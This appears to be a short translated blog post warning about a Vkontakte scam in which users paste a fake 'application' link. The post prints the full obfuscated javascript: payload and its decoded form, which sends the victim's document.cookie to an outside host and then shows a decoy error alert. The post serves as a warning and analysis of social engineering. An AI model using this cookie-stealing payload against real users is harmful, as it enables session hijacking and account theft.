Even with closed holes on Vkontakte, XSS can be arranged.

They invited me here the other day to add one application "Vkontakte". Interest prevailed - and I got to watch.

Here is what I saw:

The string is long, so the application did not fit in the input field.
I will give it in full:
javascript:page=String.fromCharCode(105,109,103,61,110,101,119,32,73,109,97,103,101,40,41,59,105,
109,103,46,115,114,99,61,39,104,116,116,112,58,47,47,118,112,111,112,107,117,46,111,114,103,47,115,117,112,47,
115,46,112,104,112,63,113,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59);
eval(page);
alert(unescape("%u041D%u0435%20%u0443%u0434%u0430%u0435%u0442%u0441%u044F%20%u0432%u044B%u043F%u043E%u043B%u043D%u0438%u0442%u044C%20%u0434%u0435%u0439%u0441%u0442%u0432%u0438%u0435%21"));

This is all pretty trivial: first, a script is executed that sends cookies to the detractor:
img=new Image();
img.src='http://vpopku.org/sup/s.php?q='+document.cookie;

And then the alert user will get the message:
“Can't do the action!”
Seeing that, the user, although distressed, but without suspecting anything, closes the application.

Therefore, I want to say again that even if all the security holes on the sites are closed, there will always be the most effective way at all times - social engineering.

PS For the first time I encountered exactly this manifestation of social engineering and XSS. If the repetition - excuse.